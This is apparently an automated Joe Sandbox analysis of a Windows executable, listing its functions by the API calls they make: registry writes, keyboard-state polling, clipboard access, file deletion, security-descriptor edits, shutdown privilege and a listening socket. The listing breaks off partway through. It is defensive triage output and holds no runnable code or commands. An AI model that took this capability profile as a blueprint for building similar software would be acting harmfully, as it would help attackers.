                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: 4017edfb603f979695185ff01fd2f0695bcae82fdba310e1887fdbe517e59008
                    • Instruction ID: 4ccb25d839666086435905013c49642e9d7d1deeefe84c03126c53d5384d85d8
                    • Opcode Fuzzy Hash: 4017edfb603f979695185ff01fd2f0695bcae82fdba310e1887fdbe517e59008
                    • Instruction Fuzzy Hash: F831F676502359AFDB20EBB1DC49ADE73ADAF09320F104275F910D3190EB34DE45CA58
                    Function 00700AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00700BDE
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0070F910,00000000,?,00000000,?,?), ref: 00700C4C
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00700C94
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00700D1D
                    • RegCloseKey.ADVAPI32(?), ref: 0070103D
                    • RegCloseKey.ADVAPI32(00000000), ref: 0070104A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: ea18d6a651dd451a8961d13ad3bafda70fced306eabd9872eda77368f4e86ffe
                    • Instruction ID: 7d0681c9aea3d10a193171df90e30fef092e28c7acf866776f2db91f00f1b300
                    • Opcode Fuzzy Hash: ea18d6a651dd451a8961d13ad3bafda70fced306eabd9872eda77368f4e86ffe
                    • Instruction Fuzzy Hash: 0A024B75200611DFCB54EF14C891A2AB7E5FF89714F088A5DF88A9B3A2CB34ED41CB95
                    Function 006EF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 006EF37E
                    • _wcscmp.LIBCMT ref: 006EF393
                    • _wcscmp.LIBCMT ref: 006EF3AA
                      • Part of subcall function 006E45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006E45DC
                    • FindNextFileW.KERNEL32(00000000,?), ref: 006EF3D9
                    • FindClose.KERNEL32(00000000), ref: 006EF3E4
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 006EF400
                    • _wcscmp.LIBCMT ref: 006EF427
                    • _wcscmp.LIBCMT ref: 006EF43E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006EF450
                    • SetCurrentDirectoryW.KERNEL32(0073A5A0), ref: 006EF46E
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006EF478
                    • FindClose.KERNEL32(00000000), ref: 006EF485
                    • FindClose.KERNEL32(00000000), ref: 006EF497
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: 795984cf6495f5ea5bd464236cfe46cd5d0aa46b0f88191ca8c19ab4ecd3eeef
                    • Instruction ID: ee43ecbfb58a3a9785c61a55e1e3d3eda4c294b5c27e2a86514a2ac12647f292
                    • Opcode Fuzzy Hash: 795984cf6495f5ea5bd464236cfe46cd5d0aa46b0f88191ca8c19ab4ecd3eeef
                    • Instruction Fuzzy Hash: 7831F772502359ABDB20AB65DC85ADE73AD9F45324F104275F840D32E1DB34DE45CA98
                    Function 006D81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006D8766
                      • Part of subcall function 006D874A: GetLastError.KERNEL32(?,006D822A,?,?,?), ref: 006D8770
                      • Part of subcall function 006D874A: GetProcessHeap.KERNEL32(00000008,?,?,006D822A,?,?,?), ref: 006D877F
                      • Part of subcall function 006D874A: HeapAlloc.KERNEL32(00000000,?,006D822A,?,?,?), ref: 006D8786
                      • Part of subcall function 006D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006D879D
                      • Part of subcall function 006D87E7: GetProcessHeap.KERNEL32(00000008,006D8240,00000000,00000000,?,006D8240,?), ref: 006D87F3
                      • Part of subcall function 006D87E7: HeapAlloc.KERNEL32(00000000,?,006D8240,?), ref: 006D87FA
                      • Part of subcall function 006D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006D8240,?), ref: 006D880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006D825B
                    • _memset.LIBCMT ref: 006D8270
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006D828F
                    • GetLengthSid.ADVAPI32(?), ref: 006D82A0
                    • GetAce.ADVAPI32(?,00000000,?), ref: 006D82DD
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006D82F9
                    • GetLengthSid.ADVAPI32(?), ref: 006D8316
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006D8325
                    • HeapAlloc.KERNEL32(00000000), ref: 006D832C
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 006D834D
                    • CopySid.ADVAPI32(00000000), ref: 006D8354
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006D8385
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006D83AB
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006D83BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: b58599dcbc30cd992ae331953b95d4836dc8430f2cec4b0158cf8f0fcad06ead
                    • Instruction ID: 38e776083698f29e43b8c8b03919d4c2b37ea0622468ba414f21b22e32b44d8b
                    • Opcode Fuzzy Hash: b58599dcbc30cd992ae331953b95d4836dc8430f2cec4b0158cf8f0fcad06ead
                    • Instruction Fuzzy Hash: CB613971D00219EFDF10DFA4DC48AEEBBBABF04710B14826AF815A7391DB359A15CB64
                    Function 00696843 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oai$PJr$UCP)$UTF)$UTF16)
                    • API String ID: 0-1636803056
                    • Opcode ID: cc7a99b7293e620efc36614979e776272a15d53918ec65c0234045ef4cddf4bb
                    • Instruction ID: 4fec2653ac2328ec9a5bf68df4b3569e2b92042364febbe086301b14ba724869
                    • Opcode Fuzzy Hash: cc7a99b7293e620efc36614979e776272a15d53918ec65c0234045ef4cddf4bb
                    • Instruction Fuzzy Hash: CB725D71E00319DBDF24CF58C8907EEB7B6EF49310F14816AE959AB790EB749D818B90
                    Function 00700665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00700038,?,?), ref: 007010BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00700737
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007007D6
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0070086E
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00700AAD
                    • RegCloseKey.ADVAPI32(00000000), ref: 00700ABA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: 45c35165d21ccd96a011c22a5098ea4278517e01510caff704cb50c536f209cb
                    • Instruction ID: 631a04631cced1da6120c447567996d713d6c61bcd247935d6d253e155f68843
                    • Opcode Fuzzy Hash: 45c35165d21ccd96a011c22a5098ea4278517e01510caff704cb50c536f209cb
                    • Instruction Fuzzy Hash: 9EE13E71204310EFCB54DF24C895E6ABBE5EF89724F04866DF44ADB2A2DB34E901CB95
                    Function 006E0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 006E0241
                    • GetAsyncKeyState.USER32(000000A0), ref: 006E02C2
                    • GetKeyState.USER32(000000A0), ref: 006E02DD
                    • GetAsyncKeyState.USER32(000000A1), ref: 006E02F7
                    • GetKeyState.USER32(000000A1), ref: 006E030C
                    • GetAsyncKeyState.USER32(00000011), ref: 006E0324
                    • GetKeyState.USER32(00000011), ref: 006E0336
                    • GetAsyncKeyState.USER32(00000012), ref: 006E034E
                    • GetKeyState.USER32(00000012), ref: 006E0360
                    • GetAsyncKeyState.USER32(0000005B), ref: 006E0378
                    • GetKeyState.USER32(0000005B), ref: 006E038A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 4087ca52a56e81eeb6ae09beda2794f0aa6b20f53c005336f99c8b6b88cea220
                    • Instruction ID: fc111a0a24089d3e2778de0e2cd77f1be309b5f132681cd64f5cc4f7de2d0191
                    • Opcode Fuzzy Hash: 4087ca52a56e81eeb6ae09beda2794f0aa6b20f53c005336f99c8b6b88cea220
                    • Instruction Fuzzy Hash: AC41EB345057CB6EFF318A6588083F5BEE26F11340F18819DD6C6477C2EBE45AC887A2
                    Function 006F4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: 7b42097ac4a48d1a4beab8fee45b9bfc2750d585ef4414a345cf4697759accfa
                    • Instruction ID: 28d45c0d5fa287799d727f939153e41bcfebadd92de671f823a2900f3e1828d2
                    • Opcode Fuzzy Hash: 7b42097ac4a48d1a4beab8fee45b9bfc2750d585ef4414a345cf4697759accfa
                    • Instruction Fuzzy Hash: C9216D35200214DFDB20AF64EC49B7A77AAEF44710F14C11AF9469B661CF79A801CB99
                    Function 006E3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006848A1,?,?,006837C0,?), ref: 006848CE
                      • Part of subcall function 006E4CD3: GetFileAttributesW.KERNEL32(?,006E3947), ref: 006E4CD4
                    • FindFirstFileW.KERNEL32(?,?), ref: 006E3ADF
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 006E3B87
                    • MoveFileW.KERNEL32(?,?), ref: 006E3B9A
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 006E3BB7
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006E3BD9
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 006E3BF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    • Opcode ID: 731fc19b4776f18650451557e4a8f077ff5ea1cab3ffd0bc26a2e10268ce88c2
                    • Instruction ID: 36f6d60cd4a8f447fd7af2b044c4d3d334d29f12373ec4e9608a6b0249f94d6c
                    • Opcode Fuzzy Hash: 731fc19b4776f18650451557e4a8f077ff5ea1cab3ffd0bc26a2e10268ce88c2
                    • Instruction Fuzzy Hash: 5751B33180229D9ACF55FBA1CD968EDB7BAAF14300F2442ADE40277291DF30AF09CB54
                    Function 00694140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: ERCP$Oai$VUUU$VUUU$VUUU$VUUU
                    • API String ID: 0-3807543480
                    • Opcode ID: dee9d5c6720c1a8b68e882c40b3de7b1b7b8828ccb5065c992e3b647b8f3a586
                    • Instruction ID: 718b461a04201bd37a0f85511ee134bdf914f59a405fc0ae9ef4fedcfb7c79a7
                    • Opcode Fuzzy Hash: dee9d5c6720c1a8b68e882c40b3de7b1b7b8828ccb5065c992e3b647b8f3a586
                    • Instruction Fuzzy Hash: 08A24C70A0421A8BDF24CF58C990BFDB7B6FB54314F1481AAD856A7B80DB349E86DF50
                    Function 006EF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 006EF6AB
                    • Sleep.KERNEL32(0000000A), ref: 006EF6DB
                    • _wcscmp.LIBCMT ref: 006EF6EF
                    • _wcscmp.LIBCMT ref: 006EF70A
                    • FindNextFileW.KERNEL32(?,?), ref: 006EF7A8
                    • FindClose.KERNEL32(00000000), ref: 006EF7BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    • Opcode ID: 242b014e4a6bb614ed16509f94b8c97c2749f4ea6d596e1d584075968cd0bdb9
                    • Instruction ID: 28b0f5bfb189a5293454db1495e04736af94e58a803657c68c776397bc883eb6
                    • Opcode Fuzzy Hash: 242b014e4a6bb614ed16509f94b8c97c2749f4ea6d596e1d584075968cd0bdb9
                    • Instruction Fuzzy Hash: 3141AF7190134A9FCF60EF64CC89AEEBBB6FF05310F14456AE815A22A1DB309E44CF94
                    Function 006958C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: def3938d9884368c591f19d2303eb2d0c71948cab5b5a0cbce1acac0767df3c0
                    • Instruction ID: 02d5f1f3fb807e48e556354d73f3b2f1884fd5009cc61a56b958516603f2cbf1
                    • Opcode Fuzzy Hash: def3938d9884368c591f19d2303eb2d0c71948cab5b5a0cbce1acac0767df3c0
                    • Instruction Fuzzy Hash: 6B128B70E00609DFEF14DFA5D981AEEB7BAFF48300F14826AE446A7251EB35AD11CB54
                    Function 00695680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006A0FF6: std::exception::exception.LIBCMT ref: 006A102C
                      • Part of subcall function 006A0FF6: __CxxThrowException@8.LIBCMT ref: 006A1041
                    • _memmove.LIBCMT ref: 006D062F
                    • _memmove.LIBCMT ref: 006D0744
                    • _memmove.LIBCMT ref: 006D07EB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                    • String ID: yZi
                    • API String ID: 1300846289-3495683823
                    • Opcode ID: 26ffdffad58a6b3ca31340ae1c3e0aa72c9c54a78c1da6a015b2bf515ce59aa1
                    • Instruction ID: 3ddf862cd302fb76e673db8d8e156c26a4be1f8bc1e1e42547f3230dd7f2d89e
                    • Opcode Fuzzy Hash: 26ffdffad58a6b3ca31340ae1c3e0aa72c9c54a78c1da6a015b2bf515ce59aa1
                    • Instruction Fuzzy Hash: 51025CB0E00209DFDF45EF64D981AAEBBB6EF44300F14806AE806DB355EB35DA51CB95
                    Function 006E545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006D8D0D
                      • Part of subcall function 006D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006D8D3A
                      • Part of subcall function 006D8CC3: GetLastError.KERNEL32 ref: 006D8D47
                    • ExitWindowsEx.USER32(?,00000000), ref: 006E549B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 458fea445fd113b0920504f9a080f33464079f0759e7400f080afe11d5511f34
                    • Instruction ID: d6348eb82352eab458c75b69aee986025e070c0f0a23aa100c10aef886111442
                    • Opcode Fuzzy Hash: 458fea445fd113b0920504f9a080f33464079f0759e7400f080afe11d5511f34
                    • Instruction Fuzzy Hash: 47014731657B55EEF7786276DC4ABFA72DAEB00746F200135FC07D62C3DA540C818294
                    Function 00693190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID: Oai
                    • API String ID: 674341424-3423572213
                    • Opcode ID: f82b49c59b1f962479a949b017b18c44c5016ba385553230814e01ec0cfc5cf4
                    • Instruction ID: 3e35bff9573d884218ccb39403578fd524378561320a0e930896d575bdf2cbe3
                    • Opcode Fuzzy Hash: f82b49c59b1f962479a949b017b18c44c5016ba385553230814e01ec0cfc5cf4
                    • Instruction Fuzzy Hash: 71229B715083119FCB64EF24C881BAAB7EAEF88714F14491DF49A97391DB30EA05CB96
                    Function 006F6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006F65EF
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F65FE
                    • bind.WSOCK32(00000000,?,00000010), ref: 006F661A
                    • listen.WSOCK32(00000000,00000005), ref: 006F6629
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F6643
                    • closesocket.WSOCK32(00000000,00000000), ref: 006F6657
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
